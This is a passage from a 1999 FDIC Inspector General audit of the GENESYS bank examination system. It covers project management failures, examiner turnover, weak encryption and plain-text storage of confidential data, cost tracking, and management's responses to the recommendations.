FDIC also assumed unnecessary risk by proceeding with detailed design and development of\nFRS-specific requirements for GENESYS without FRS approvals of a project work plan, FRD or\nsystem design document. Although senior FDIC and FRS management were generally aware of the\nproject\'s scope and objectives through high level briefings, generally accepted SDLC procedures\nrequire that critical SDLC deliverable products be completed and formally approved by key project\nparticipants before making significant investments in subsequent life cycle phases. We believe that\nthe FDIC can improve its interagency coordination on the many planned enhancements to\nGENESYS by formalizing up-front interagency development agreements and adhering more closely\nto generally accepted SDLC procedures.\n\nIn January 1997, the FDIC and FRS entered into a MOU establishing a framework for the\ndevelopment of an interagency bank safety and soundness examination system. The agreement\nestablished an interagency task force comprised of FDIC, FRS, and state examiners for the purposes\nof (1) specifying a set of joint requirements for the system, (2) estimating the time and resources\nrequired to develop the system, and (3) proposing a development approach. The agreement also\nprovided for regular involvement of senior FDIC and FRS management. Specifically, the MOU\nstated: \xe2\x80\x9cFinal approval of all work products and recommendations of the examination team and IS\nsupport staff will be granted jointly by the FRS Director of Bank Supervision and Regulation and the\nFDIC Director of Supervision within two weeks of submission of project deliverables.\xe2\x80\x9d\n\n\n                                                14\n\x0cIn May 1997, the FDIC\'s DIRM and DOS completed a draft project work plan that contained a\nproposed approach for developing GENESYS and an estimate of the time and resources that the\nFDIC would dedicate to the development effort. However, the project work plan did not address the\ntasks or responsibilities of other agencies involved with the project, such as FRS or CSBS. The draft\nproject work plan also did not address the resource commitments that those agencies would make to\nthe project. Although the draft project work plan was subsequently approved by senior FDIC\nmanagement, it was never approved by FRS management. We spoke with representatives of FRS\nand CSBS and learned that their agencies did not develop separate project work plans for\nGENESYS. The FRS and CSBS representatives informed us that they were relying on the FDIC to\nplan for the development of GENESYS.\n\nIn addition, no effort was made to quantify the level or source of resources that would be needed to\naddress FRS-specific requirements that were not related to the FDIC\'s safety and soundness\nexamination responsibilities. We noted that the FDIC was providing programming resources to\nsatisfy FRS specific requirements and that the FDIC had made informal commitments to provide\nresources for FRS examiner training and software maintenance. In our opinion, DIRM and DOS\nmanagement should obtain FDIC Board of Director approval prior to investing significant FDIC\nresources to satisfy non-FDIC requirements.\n\nAccording to the FDIC\'s SDLC Manual, the purpose of a project work plan is to formally capture\nand document agreements among project participants regarding project scope, tasks, schedule,\nallocated resources, and interrelationships with other projects. The Manual states: "the Project\nWork Plan will make clear the responsibility and accountability of the various parties." By securing\nan informed agreement up-front, and revisiting the agreement throughout the project\'s life cycle,\ndevelopers can better prevent cost and schedule overruns and ensure that the project will meet\nexpected results. Obtaining formal, senior management approval of a project work plan also ensures\nthat management has the information necessary to make informed decisions on the project and that\nchanges in the project\'s scope, costs, and time schedules are adequately controlled.\n\nIn May 1997, the interagency task force completed a high level, 6-page requirements analysis for\nGENESYS. The analysis was approved by FDIC, FRS, and CSBS project managers for\nGENESYS. However, the analysis was not formally approved by senior FDIC and FRS\nmanagement as required by the interagency MOU. Senior FDIC management approved a more\ndetailed GENESYS FRD and system design document in August 1997 and October 1997,\nrespectively. However, these documents were not approved by FRS management, as required by the\nMOU and generally accepted SDLC principles.\n\nThe FDIC\'s SDLC Manual states that user requirements must be defined, documented, and approved\nin a FRD before making significant investments in detailed design and development work. The\nSDLC Manual states that the FRD "serves as the foundation for system design and development."\nThe SDLC Manual also states that detailed design specifications for a proposed system are to be\ndocumented and approved before making significant investments in development work. These\nprinciples are basic to the SDLC methodology.\n\n\n\n                                                 15\n\x0cFRS approval of the GENESYS FRD and system design document would have helped ensure that\nGENESYS met their needs and reflected a more clear indication of their level of commitment to the\nproject. We noted that FRS raised several concerns regarding the GENESYS project in April 1997.\nThese concerns included the amount of time and cost required to develop GENESYS, the lack of an\ninteragency cost-benefit analysis, and the lack of risk-focused examination support proposed for the\nsystem. These concerns were a contributing factor in FRS\' less than full commitment to the project\nduring the design and development phases of GENESYS and their decision to temporarily withdraw\nfrom the project in May 1997 and November 1997. DIRM officials indicated that FRS\' lack of\ncommitment to the GENESYS project during 1997 caused significant disruption and delays to the\nproject.\n\nWe believe the FDIC can more effectively evaluate the commitment of other organizations to joint\ndevelopment efforts by requiring those agencies to formally approve critical SDLC deliverable\nproducts before investing significant resources in subsequent SDLC phases. Joint approval of SDLC\ndeliverable products will allow senior managers of participating agencies to better understand their\nrole and responsibilities on IT projects, as well as the resources that are needed by each participant to\ncomplete the effort. Joint approval of SDLC deliverable products will also help ensure that system\nrequirements and design meet agencies\' needs.\n\n\nRecommendations\n\nWe recommend that the Directors, Division of Information Resources Management and Division of\nSupervision:\n\n(7)     Formally document and obtain interagency approval of the scope, tasks, schedule, and\n        resources associated with any major enhancement to GENESYS.\n\n(8)     Obtain formal, interagency approval of all SDLC deliverable products required by the\n        FDIC\'s SDLC process for major planned GENESYS enhancements.\n\n(9)     Obtain FDIC Board of Director approval prior to investing significant FDIC resources to\n        satisfy non-FDIC requirements on GENESYS.\n\n\nNEED FOR CONTINUITY OF EXAMINATION STAFF\n\nA high turnover of DOS examination staff assigned to the GENESYS project impeded critical\ndevelopment activities, including requirements definition and system design, and introduced\nunnecessary delays to the project schedule. We noted that four different DOS program managers\nwere assigned to the GENESYS project during its 2 1/2-year development cycle. In addition, DOS\nexamination staff assigned to work on the GENESYS project were replaced every 120 days.\n\nThe high turnover of examiners assigned to the GENESYS project resulted in differing perspectives\non the design of the GENESYS modules and screens, resulting in changes to ongoing design and\n\n                                                  16\n\x0cdevelopment efforts. In addition, because senior DOS and DIRM management had not formally\napproved a functional requirements or system design document until after development of\nGENESYS had begun, controls over design changes made by rotating examination staff were\ndiminished. The inefficiencies and delays caused by the high turnover of DOS examination staff\nwere exacerbated by an equally high turnover of FRS and state examiners working on the project\nand DIRM\'s use of an evolutionary prototyping approach for development.\n\nAlthough work on an initial release of GENESYS was completed in August 1998, FDIC has already\nplanned major enhancements to the system. We believe that DOS and DIRM can achieve significant\ntime savings and efficiencies when addressing these planned GENESYS enhancements by\nappointing a permanent DOS program manager and maintaining a core staff of key personnel that\nare committed to the project until its completion.\n\nThe GENESYS developers recognized early in the project\'s life cycle that the high turnover of DOS\nexaminers was affecting the efficiency and timeliness of the GENESYS development process. The\nGENESYS project work plan states: "All efforts required to bring new team members up to speed as\nexisting team members depart and are replaced are essentially non-productive hours and will\nintroduce delays in the schedule. Project experience to date has demonstrated that as new team\nmembers are brought on, significant team time is required to familiarize them with the project, their\nroles and their assignments, and to explain why certain decisions were made; resolved issues again\nbecome topics of debate and second-guessing. Loss of continuity becomes a problem, particularly\nwhen an assigned deliverable has a long development or delivery time, e.g., training materials or\nuser manuals."\n\nWhile some staff turnover on projects with long development schedules should be expected, sound\nbusiness practices suggest that a program manager and a core group of program team members be\nmaintained throughout a project\'s development life cycle. Project Management for Mission Critical\nSystems, a handbook developed by the Information Technology Resources Board (ITRB) in October\n1997,1 stresses the importance of keeping the core development team members together. The\nhandbook recommends that management maintain a commitment to the integrity of key project\nplayers, including program office officials, from project conception through implementation. Senior\nDIRM and DOA management identified a high turnover of project staff as a contributing factor in\nthe FDIC\'s recent decision to terminate another major corporate automation effort, TAPS. In\naddition, GAO has cited frequent turnover of project managers and other key development personnel\nas a common cause of system failures in the federal government.\n\nThe inefficiencies and delays caused by the high turnover of DOS examination staff were\nexacerbated by an equally high turnover of FRS and state examiners assigned to the project. We\nnoted that FRS had assigned three different project managers to the GENESYS project and that\nCSBS had assigned four different project managers to the GENESYS project during 1997 and 1998.\nWe also noted that FRS and CSBS examination staff turned over about every 30 to 90 days. In\n\n1\n ITRB was created in July 1996 pursuant to Executive Order 13011. ITRB performs peer reviews of major systems\ninitiatives in the federal government and publicizes the resulting lessons learned and promising practices. ITRB consists\nof IT, acquisition, and program professionals with significant experience in developing, acquiring, and managing\ninformation systems in the federal government.\n                                                           17\n\x0caddition, DIRM\'s decision to use an evolutionary prototyping approach for GENESYS development\nmade the project more sensitive to personnel turnover. DIRM\'s evolutionary prototyping approach\ninvolved extensive developer/user interaction to build requirements and design specifications into a\nworking software prototype. Developers placed less emphasis on maintaining up-to-date\nrequirements and design documentation than prescribed by the FDIC\'s SDLC process. As a result,\nas examiners left the GENESYS project, so did much of the knowledge and rationale underlying\nwhy decisions relating to GENESYS requirements and design were made.\n\nThe DOS program manager for GENESYS informed us that some steps had been taken in late\n1997 and 1998 to mitigate the impact of examiner turnover. For example, DOS examination\nstaff improved GENESYS user documentation. However, the DOS program manager also\nindicated that in addition to the personal and professional disruption of being away from their\nduty station for an extended period, there were financial disadvantages for examiners on detail\nfor more than 120 days.\n\nWe believe that DOS management should explore alternatives to detailing key examination staff\nto the GENESYS project for short periods of time. In our opinion, a core group of DOS staff\nshould be assigned to development projects and planned enhancements to GENESYS from\ninitiation through implementation. We recognize that the FDIC cannot direct the staff\nassignments of other organizations. However, the FDIC can significantly reduce its exposure to\ncost and schedule overruns on future systems development projects and planned enhancements to\nGENESYS by ensuring greater continuity of its assigned staff. The continuity associated with\nreduced examiner turnover should allow the FDIC to more efficiently address its role as the lead\nbanking agency for the maintenance and development of the planned enhancements to\nGENESYS.\n\n\nRecommendations\n\nWe recommend that the Director, Division of Supervision:\n\n(10)   Evaluate the feasibility of establishing a permanent staff to manage the development,\n       operation, and maintenance of major DOS systems including GENESYS.\n\n(11)   Ensure that a core group of staff is assigned to future systems development or enhancement\n       projects until the project is completed.\n\n\nIMPROVED SAFEGUARDS NEEDED TO PROTECT CONFIDENTIAL\nBANK EXAMINATION DATA\n\nGENESYS security features that were designed to prevent the unauthorized disclosure of\nconfidential bank examination information need to be improved. Specifically, GENESYS uses a\ncompression program called addZIP Compression Libraries (addZIP) to encrypt confidential bank\nexamination data processed by GENESYS. However, addZIP does not encrypt sensitive files that\n\n                                                18\n\x0care created and permanently stored on the laptop\'s hard drive each time users utilize the print\nfunction in GENESYS. When a user prints information in GENESYS, such as a report of\nexamination page, GENESYS creates a copy of the printed information and stores it in plain text on\nthe laptop\'s hard drive. Because printed information is stored outside of GENESYS, it is neither\nencrypted nor protected by the application\'s login ID and password.\n\nIn addition, a file containing GENESYS login IDs and passwords is saved to the laptop\'s hard drive\nin plain text whenever a user fails to exit the application properly. Examples of when a user would\nfail to exit the application properly include power disruptions, software errors requiring users to\nreboot the laptop, or users simply turning the laptop power off without first exiting GENESYS.\nAlthough the examiner laptops have power-on passwords that are intended to restrict access to any\ninformation contained on the laptop, these passwords can be circumvented by simply removing the\nlaptop\'s battery.\n\nAdditionally, DIRM has not demonstrated that addZIP complies with Federal Information\nProcessing Standards (FIPS) or broader industry standards governing the effective protection of\nsensitive data. We identified several Internet sites containing detailed descriptions of software\nprograms capable of cracking addZIP\'s encryption algorithm. We obtained one such readily\navailable freeware attack program from the Internet and successfully ran it against the GENESYS\ndatabase. We were able to crack addZIP\'s encryption algorithm, obtain the passwords used to\nprotect the database, and view confidential bank examination data. We noted that the passwords\nused by addZIP to protect the GENESYS database and data did not meet the corporate standards\ndescribed in FDIC Circular 1360.10, Corporate Password Standards, including minimum length of\npasswords or use of alpha and numeric characters. We concluded that addZIP is not a reliable means\nof protecting sensitive data.\n\nDIRM and DOS defined the information security requirements for GENESYS in the FRD and\nsystem design document. The FRD states: "GENESYS will contain volumes of institution specific\nfinancial information including detailed listings of the institution\'s loan customers. There will be\nseveral subjective comments concerning management and the institution\'s loan customers. This\ninformation is highly confidential\xe2\x80\xa6" The FRD identifies several security features that DIRM\nplanned to implement to significantly reduce the likelihood of unauthorized access to GENESYS\ndata, including the encryption of the application\'s database and the use of passwords to restrict access\nto the application. The FRD also states that GENESYS information security should comply with\nFIPS and the law.\n\nDOS derived its information security requirements for GENESYS, in part, from Part 309 of FDIC\'s\nRules and Regulations, which strictly prohibit the public disclosure of any information contained in a\nreport of examination. FRS, as well as individual state banking regulators who will be using\nGENESYS, have similar legal restrictions over the public disclosure of bank examination findings\nand ratings. In addition, federal statutes protect the confidentiality of information pertaining to\nindividual loan customers.\n\nDIRM initially planned to ensure the confidentiality of sensitive GENESYS data using\ncryptographic security products developed by Entrust Technologies, Inc. Entrust Technologies\n\n                                                  19\n\x0chas implemented in Entrust a cryptographic module which has been validated by the National\nInstitute of Standards and Technology (NIST) and meets the Level 1 requirements of the\nstandard. In addition, the GENESYS project work plan states that Entrust had been selected by\nFDIC as a corporate standard for data protection, encryption, and session security support.\nHowever, reservations expressed by FRS about the complexity of implementing and maintaining\nEntrust and emphasis on meeting the GENESYS development schedule delayed implementation\nof Entrust with GENESYS.\n\nIn May 1998, we learned that DIRM and DOS had proceeded with a live pilot implementation of\nGENESYS in four banks without any data encryption. We immediately discussed the FDIC\'s\nplans regarding the security of GENESYS data with DIRM and DOS officials and, in June 1998,\nDIRM decided to encrypt GENESYS data using addZIP. We were informed that addZIP would\nserve as an interim solution to GENESYS\' encryption requirements until a permanent solution\ncould be identified.\n\nWe researched and tested the data encryption capabilities of addZIP and identified several\nlimitations:\n\n\xe2\x80\xa2     The GENESYS FRD states that one of the GENESYS security requirements is to comply with\n      FIPS and the law. However, DIRM has not demonstrated that addZIP complies with NIST FIPS\n      or broader industry standards governing the effective protection of sensitive data.\n\n\xe2\x80\xa2     There are several readily available software attack programs on the Internet capable of cracking\n      addZIP\'s encryption algorithm. We successfully ran one such attack program against the\n      GENESYS database and were able to crack addZIP\'s encryption algorithm and obtain the\n      passwords used to protect the GENESYS database.\n\n\xe2\x80\xa2     Passwords used by addZIP to protect the GENESYS database did not meet the corporate\n      standards described in FDIC Circular 1360.10, Corporate Password Standards, or broader\n      industry standards, regarding length of passwords or use of alpha and numeric characters.\n\n\xe2\x80\xa2     AddZIP is compatible with PKzip2, a widely used data compression program on personal\n      computers. Data files compressed and encrypted using addZIP can also be decompressed and\n      decrypted using PKzip. As a result, data could be read by unauthorized individuals with access\n      to examiner laptop computers.\n\n\xe2\x80\xa2     Although a password can be used to protect data that is encrypted by addZIP, the password is not\n      "hashed" (i.e., scrambled using an initializer to reduce the likelihood of it being deciphered by an\n      attacker). Hashing is a basic tenet of modern encryption.\n\nSecurity weaknesses, such as those discussed above, are typically detected and corrected during an\napplication\'s SQT. The FDIC\'s SDLC Manual states that the purpose of a SQT is to validate that\nfunctional requirements, including security, are satisfied by the developed system and that there are\n\n2\n    PKzip is a registered trademark of PKWARE, Inc.\n                                                      20\n\x0cno adverse effects on the overall process or other existing systems. However, as discussed in an\nearlier section of this report, a formal SQT was not performed for GENESYS, despite concerns\nexpressed by our office to senior DIRM and DOS management in May 1998. We advised the DIRM\nand DOS project managers for GENESYS of our findings regarding the limitations of GENESYS\nsecurity on September 10, 1998 so that they could take appropriate actions in as timely a manner as\npossible. At the close of our field work, DIRM was researching the possibility of replacing addZIP\nwith Entrust.\n\nApplying new technologies to the bank examination process offers examiners significant advantages\nover traditional manual examination techniques. For example, GENESYS will improve the amount\nand timeliness of bank examination data available to examiners during examinations. Data query\nand analysis tools contained within GENESYS will also offer examiners a number of advantages\nover traditional manual examination techniques. However, advanced technology also presents new\nand potentially more serious security threats, such as the unauthorized disclosure of confidential\nbank examination information or the undetected alteration of sensitive data reported by or relating to\na bank. Protecting sensitive bank examination information is an important element of public trust\nand confidence in bank supervision and regulation. While the measures taken to protect sensitive\ndata should be commensurate with the security levels of the data being protected, we believe that\nimproved safeguards are needed to ensure that confidential GENESYS data is adequately protected\nfrom unauthorized disclosure or alteration.\n\n\nRecommendations\n\nWe recommend that the Director, Division of Information Resources Management:\n\n(12)   Incorporate security features into GENESYS that will adequately address the security\n       requirements contained in the functional requirements document and that will provide\n       reasonable assurance that confidential bank examination information will be adequately\n       protected against unauthorized disclosure or alteration.\n\n(13)   Direct DIRM\'s Information Security Section to perform a security review of GENESYS to\n       ensure compliance with corporate security standards and guidelines and to ensure that the\n       application has adequate security.\n\n\nTRACKING AND REPORTING OF GENESYS COST-BENEFIT INFORMATION CAN\nBE IMPROVED\n\nGenerally, DIRM and DOS needed to maintain more complete and up-to-date cost-benefit\ninformation on GENESYS throughout its life cycle. Although DIRM had an established process for\ntracking and reporting its expenditures on GENESYS, the process did not track or report significant\nprogram office costs incurred by DOS examiners and others assigned to the project. DIRM\'s process\nalso did not track or report full life cycle (i.e., inception to date) costs for GENESYS. Program\noffice and life cycle cost information are basic tenets of any successful IT investment decision\n\n                                                 21\n\x0cmaking process.\n\nIn addition, we observed that GENESYS cost-benefit information had not been continually\nevaluated throughout the life cycle of GENESYS as material changes occurred from earlier\nprojections. Tracking program office and life cycle costs on GENESYS enhancements will provide\nmanagement with more accurate and complete IT cost data with which to measure performance and\nmake critical investment decisions. Improved project information will also allow managers to better\nmeasure project performance by comparing cost data to original projections.\n\nDIRM implemented the DIRM Budget Support System (DBSS) in 1997 to track the division\'s\nexpenditures and commitments against approved budgets for each of its IT projects. DBSS tracked\nDIRM\'s expenditures and commitments on IT activities by allocating DIRM expenses, such as\nemployee salaries, travel, and contractor billings, to specific IT projects. DIRM maintained this\ninformation in a centralized Lotus Notes3 database. Periodic cost reports identifying budgets and\nrelated expenditures for selected IT projects were provided to the FDIC\'s IT Technical Committee\nand IT project managers for their consideration in making management decisions. Additional, high\nlevel cost-benefit information was developed for GENESYS as part of DIRM\'s annual planning and\nbudgeting for new and ongoing IT projects and provided to the FDIC\'s IT Technical Committee.\n\nWhile DBSS provided management with valuable financial information about GENESYS, the\nsystem did not account for significant DOS personnel and travel costs incurred on the project. The\nDOS program manager for GENESYS indicated that examiners began recording their hours spent on\nGENESYS in the Scheduling Hours and Reporting Package (SHARP) in January 1998. SHARP is a\ncomputerized hours tracking system used by DOS examiners to allocate their time spent on specific\ntasks. However, DIRM and DOS project personnel were not tracking or comparing DOS costs to\nprojected cost estimates.\n\nAlthough DOS personnel and travel costs were not being tracked or reported, the DIRM and DOS\nproject managers for GENESYS indicated that significant DOS resources were being expended on\nthe project. For example, the GENESYS project work plan, approved August 28, 1997 estimated\nthat DOS would expend approximately $2.6 million in personnel resources on the project during the\nperiod of June 1, 1997 through December 31, 1998. We noted that the $2.6 million figure did not\ninclude DOS travel expenses or significant DOS personnel resources expended on the project prior\nto June 1, 1997.\n\nOMB Circulars No. A-109, Major Systems Acquisitions, and No. A-11, Planning, Budgeting, and\nAcquisition of Capital Assets, require federal agencies to monitor the full life cycle costs of their IT\ninvestments, including all costs incurred to bring the investment to a form and location suitable for\nits intended use. For example, program office costs should be tracked as life cycle costs and\ncompared to estimates and cost-benefit analyses throughout a project\xe2\x80\x99s life cycle. Sound business\npractices also dictate that significant costs associated with system development projects be tracked\nand reported to management.\n\n\n3\n    Lotus Notes is a registered trademark of Lotus Development Corporation.\n\n                                                         22\n\x0cDIRM also did not track life cycle (i.e., inception to date) costs for GENESYS. We noted that\nDBSS contained only current year cost data and that the system was used primarily to ensure that\nDIRM\'s annual budget for GENESYS was not exceeded. The DIRM project manager for\nGENESYS indicated that, while not readily available, full life cycle cost data could be reconstructed\nfor GENESYS by researching the project files. However, any reconstructed life cycle data would\nnot be complete because program office costs were not being maintained. Further, unless full life\ncycle cost data is tracked, analyzed, and reported, it cannot benefit the FDIC\'s management decision\nmaking process.\n\nWe concluded that, as of the close of our field work, DIRM and DOS system development staff had\nnot provided senior FDIC management with a full life cycle cost estimate for GENESYS that was\nreviewed and approved. The GENESYS project work plan, which was approved by senior DIRM\nand DOS management on August 28, 1997 estimated the cost to design, develop, and implement\nGENESYS to be approximately $7.4 million. This same estimate was also provided to the FDIC\'s\nBoard of Directors in a formal request for expenditure authority dated July 15, 1997. However, the\n$7.4 million estimate significantly underestimated the total life cycle cost to the FDIC for developing\nand implementing GENESYS. Specifically, the $7.4 million figure did not include several million\ndollars4 in DIRM and DOS personnel, contractor, travel, hardware, software and other costs incurred\non the project from December 1995, when the project was initiated, through May 31, 1997. The\n$7.4 million estimate also did not include approximately $2.9 million in software support,\nmaintenance, and enhancement costs that DIRM estimated would be incurred on the project during\nthe period 1999 through 2002.\n\nThe DIRM project manager for GENESYS indicated that DOS program office and life cycle cost\ndata were not being tracked or reported for GENESYS because the FDIC had no requirement to do\nso and because management had not requested this information. OMB Circulars No. A-11,\nPlanning, Budgeting, and Acquisition of Capital Assets, and A-109, Major System Acquisitions,\nrequire federal agencies to monitor the full life cycle costs of their IT investments. Without periodic\ncomparisons of original estimates and cost-benefit analyses to actual results, agencies cannot\ndetermine whether their IT investments will deliver promised benefits within cost and risk\nlimitations. Government oversight agencies, such as OMB and GAO, have also stressed the need for\ncurrent, accurate, and complete cost information on which to base IT investment decisions in\npublications, such as GAO\xe2\x80\x99s February 1997 guide, Assessing Risks and Returns: A Guide for\nEvaluating Federal Agencies\xe2\x80\x99 IT Investment Decision-making.\n\nIn an OIG report, Audit of FDIC Resource and Cost Tracking Systems for Information Systems\nProjects, dated March 6, 1998 we recommended that DIRM and DOF work with representatives of\nthe FDIC\'s business units to develop a capability to track and report total costs associated with IT\nprojects, including program office costs. We also recommended that DIRM begin tracking and\nreporting full life cycle costs on IT projects. In addition, we recommended that DIRM develop\npolicies and procedures that would require IT project managers to routinely review actual life cycle\n\n4\n  We were unable to quantify the exact amount of expenditures incurred by DIRM and DOS on the GENESYS project\nbetween December 1995 and May 31, 1997 because IT expenditures were not tracked and reported during this entire\nperiod. We estimated the total costs incurred by DIRM and DOS during this period using DIRM estimates and actual\ncosts, where available.\n                                                       23\n\x0cinformation on project costs to date, expected benefits, estimated timelines for implementation, and\nrisks and to compare that information with the information that was relied upon by senior\nmanagement at the outset of the project. Because DIRM and DOF management agreed to\nimplement actions that were responsive to our recommendations, we are making no\nrecommendations in this report at this time.\n\n\nCORPORATION COMMENTS AND OIG EVALUATION\n\nOn March 15, 1999 the Directors, DIRM and DOS, provided a written response to the draft\nreport. The response is presented in Appendix I of this report. A summary of management\'s\nresponses to the recommendations contained in this report follows.\n\nThe Director, DIRM, stated that DIRM recognizes the problems in the project management\nprocess. As stated in its previous response to the OIG\'s report entitled Audit of the Time and\nAttendance Processing System Development Project (II), dated February 22, 1999, DIRM has\nstrengthened existing processes and established new mechanisms to address this overall problem.\nSpecifically, the Director, DIRM, stated that DIRM had developed more complete and robust IT\nplans for all projects, implemented internal controls designed to ensure that developers adhere to\nrequired SDLC procedures, established new management reporting, and implemented a post\nimplementation review program for new systems. DIRM has also established procedures to\nensure that significant changes in major projects are brought to the IT Technical Committee for\nreview and approval. In addition, DIRM implemented new procedures for conducting cost-\nbenefit analyses (CBA) which will be formally published with the next release of the SDLC\nManual, currently scheduled to be completed by April 30, 1999.\n\nFor recommendations 1-3, the Director, DIRM, stated that a formal CBA format and a $3 million\nthreshold for performing CBAs exists for DIRM projects, but that these procedures were not in\nplace when GENESYS was initiated. Subsequent to management\'s written response to our\nreport, the Director, DIRM, and the IT Technical Committee decided to eliminate the $3 million\nCBA threshold. Beginning March 24, 1999, a specific dollar threshold will no longer be used for\ndetermining whether a CBA is required for IT projects. The IT Technical Committee planned to\nreview all 1999 IT development projects to determine which projects require a CBA by March\n30, 1999.\n\nIn addition, the Director, DIRM, will issue a memorandum to all DIRM project managers by\nMarch 31, 1999 re-emphasizing the new CBA guidelines. The DIRM memorandum will remind\nDIRM project managers to alert senior management to significant changes in cost-benefit\ninformation, timelines, or increased risk. The DIRM memorandum will also communicate new\npolicy requiring project managers to formally revisit alternative solutions when significant scope,\ncost, risk, or schedule changes occur on IT projects. The Director, DIRM, stated, that significant\ncost deviations will be defined as over-runs of 20 percent or more and significant schedule slips\nas deviations of more than 60 days. However, subsequent to management\'s written response to\nour report, the IT Technical Committee decided to review any IT project that has been flagged\nwith variances in DIRM\'s IT Plan Database. After reviewing these projects, the IT Technical\n\n                                                 24\n\x0cCommittee will request briefings from the DIRM project manager and client sponsor on projects\nconsidered significant. If the impact of the variance warrants, the IT Technical Committee will\nrecommend IT Council review. Procedures for performing, updating, and maintaining CBAs\nwill be formally published in the next release of FDIC\'s SDLC Manual.\n\nFor recommendations 4-6, the Director, DIRM, will issue a memorandum to all DIRM project\nmanagers by March 31, 1999 re-emphasizing existing requirements that prerequisite SDLC phases\nbe substantially completed and approved before proceeding with subsequent phases. This\nrequirement will be highlighted in the upcoming SDLC revision. The referenced memorandum will\nalso remind project managers to adhere to the phased testing approach prescribed by FDIC\'s SDLC\nManual for all future systems development projects and enhancements. In addition, DIRM will\nmake an assessment as to whether deviations from FDIC\'s SDLC process, similar to the evolutionary\nprototyping methodology used to develop GENESYS, may benefit FDIC\'s small, non-complex\nsystems initiatives that involve short development schedules. An initial assessment of evolutionary\nprototyping will be completed by June 30, 1999, with a schedule for updating FDIC\'s SDLC Manual\nto be developed no later than July 30, 1999.\n\nFor recommendations 7-9, the Directors, DIRM and DOS, stated that an interagency steering\ncommittee had been established to oversee the development and enhancement of interagency bank\nexamination tools, including GENESYS. The steering committee will formally approve all SDLC\ndeliverable products required for any major GENESYS enhancement, including an interagency\nproject work plan describing life cycle scope, tasks, schedule and resource estimates. In addition,\nDIRM and DOS will explicitly identify and present any significant resources for non-FDIC\nGENESYS requirements to the FDIC Board of Directors as part of the annual budget process. Any\nsignificant resources required for non-FDIC GENESYS requirements that were not approved as part\nof the annual budget process will also be presented to the FDIC Board of Directors for approval.\n\nFor recommendations 10 and 11, the Director, DOS, stated that a permanent Examination Specialist\nposition had been created to manage DOS\' bank examination software development, including\nGENESYS, and that 3 field examiners had been appointed for one-year detail assignments.\n\nFor recommendations 12 and 13, the Director, DIRM, stated that discussions were ongoing with\nrepresentatives from the FRS and CSBS to identify a security solution for GENESYS. Once\nidentified, the solution will be incorporated into the system with the implementation of GENESYS\nversion 1.2, currently scheduled for release in the fourth quarter of 1999. In addition, DIRM has\nappointed an Information Security Section staff member to the project team who will be responsible\nfor conducting appropriate reviews and other actions to ensure that GENESYS version 1.2 is in full\ncompliance with corporate security standards.\n\nThe Corporation\'s response to the draft report provides the elements necessary for management\ndecisions on each of the report\'s recommendations. Accordingly, no further response to this report is\nrequired. However, we are providing additional comments below regarding management\'s response\nto recommendations 3, 4, 5 and 9. Appendix II presents management\'s proposed actions\n\n\n\n                                                 25\n\x0con our recommendations and shows that there are management decisions for each recommendation\nin this report.\n\nWe state in Recommendation 3 that the Director, DIRM, revise the FDIC\'s SDLC Manual to require\nthat as significant changes occur in a project\'s scope, risk, estimated resources, or timeframes, that\nthese changes be approved by the IT Council. The OIG made a similar recommendation in a\nrecently issued report entitled Audit of the Time and Attendance Processing System Development\nProject II, dated February 22, 1999. In its response to the TAPS report, recommendation 3 of this\nreport, and subsequent correspondence, DIRM indicated that significant scope, cost, risk, and\nschedule changes would be presented to the IT Technical Committee for approval and that the IT\nTechnical Committee would report significant issues to the IT Council.\n\nOn March 10, 1999 representatives of our office met with members of the IT Technical Committee\nand advised them that, in our opinion, the charters of the IT Technical Committee and IT Council\nplace authority for approval of IT projects and related changes with the IT Council. In response to\nour discussion, the IT Technical Committee decided to review its charter and recommend\nmodifications to the IT Council that would delegate responsibility for project review to the IT\nTechnical Committee. As we indicated in the referenced March 10, 1999 meeting, we believe that\nresponsibilities for reviewing and approving IT projects should remain with the IT Council.\n\nIn response to recommendations 4 and 5, the Director, DIRM, stated that DIRM project managers\nmay continue to propose different development methodologies than the phased approach prescribed\nby FDIC\'s SDLC Manual when justified by business needs and circumstances. The Director, DIRM,\nadded that proposals to utilize significantly different approaches to phased development will be\nconsidered on a case-by-case basis and approved or denied in writing by senior DIRM management\nafter a review of the probable risks and benefits of the proposed approach. As stated in the body of\nthis report, we believe that FDIC\'s large, complex systems initiatives, such as GENESYS, should\nfollow the phased development methodology prescribed by FDIC\xe2\x80\x99s SDLC process. In addition, we\nbelieve that prototyping techniques should be strictly limited to the requirements gathering phase of\nIT projects as prescribed by the FDIC\'s SDLC Manual. However, we recognize that evolutionary\nprototyping that extends beyond the requirements definition phase, similar to the methodology used\non GENESYS, may be useful on FDIC\'s small, non-complex systems initiatives that involve short\ndevelopment schedules.\n\nAny proposal to significantly deviate from the phased development approach prescribed by FDIC\'s\nSDLC process should include a formal written analysis of the risks and benefits associated with the\nalternative approach. In addition, proposals to significantly deviate from FDIC\'s SDLC process\nshould, at a minimum, be approved in writing by the Director, DIRM, and the program office\nDirector. Alternative development approachs should also be provided the IT Council for review and\napproval. As with any development effort, alternative approaches should require the completion and\napproval of all critical SDLC deliverable products prescribed by FDIC\'s SDLC Manual.\n\nIn response to recommendation 9, the Directors, DIRM and DOS, stated that their divisions will\nbegin identifying and presenting any significant resources for non-FDIC GENESYS requirements to\nthe FDIC Board of Directors as part of the annual budget process. Any significant resources\n\n                                                 26\n\x0crequired for non-FDIC GENESYS requirements that are not approved as part of the annual budget\nprocess will also be presented to the FDIC Board of Directors for approval. In our opinion,\nsignificant cost deviations associated with non-FDIC requirements should be presented to the IT\nTechnical Committee for approval, just as significant cost deviations associated with FDIC\nrequirements must be approved by the IT Technical Committee.\n\n\n\n\n                                               27\n\x0c                                                                                                     APPENDIX I\nFDIC\nFederal Deposit Insurance Corporation\n3501 North Fairfax Drive. Arlington, VA 22226         Division of Information Resources Management\n\n\nMarch 15, 1999\n\nMEMORANDUM TO:                         David H. Loewenstein\n                                       Assistant Inspector General\n\n\n\nFROM:                                  Donald C. Demitros\n                                       Director, DIRM\n\n\n\n\n                                       James L. Sexton\n                                       Director, DOS\n\nSUBJECT:                               Response to Draft Report Entitled Follow-on Audit of the\n                                       General Examination System (GENESYS) Development Project\n\nThe Division of Information Resources Management (DIRM) and the Division of Supervision\n(DOS) appreciate the opportunity to formally respond to the recommendations contained in the\nsubject report. In general, the recommendations in this report focus on breakdowns in the project\nmanagement process and not on the quality of the product, with the exception of identified security\nweaknesses. In fact, the report states that that \xe2\x80\x9cGENESYS would generally satisfy their [the DOS\nexaminers\xe2\x80\x99] requirements for generating a safety and soundness ROE.\xe2\x80\x9d DIRM recognizes the\nproblems in the project management process and, as previously stated in its response to TAPS audit,\nhas strengthened existing processes and established new mechanisms to address 